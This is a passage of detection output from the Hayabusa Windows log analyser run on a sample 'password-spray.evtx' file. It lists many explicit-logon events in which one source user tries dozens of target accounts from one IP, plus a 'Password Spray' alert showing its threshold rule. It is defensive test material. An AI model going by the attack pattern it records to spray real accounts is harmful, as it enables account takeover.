DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:bgreenwood/baker/drook/jorchilles/ssims/dmashburn/edygert/bgalbraith/bking/cragoso/jlake/smisenar/mdouglas/cspizor IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- -2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 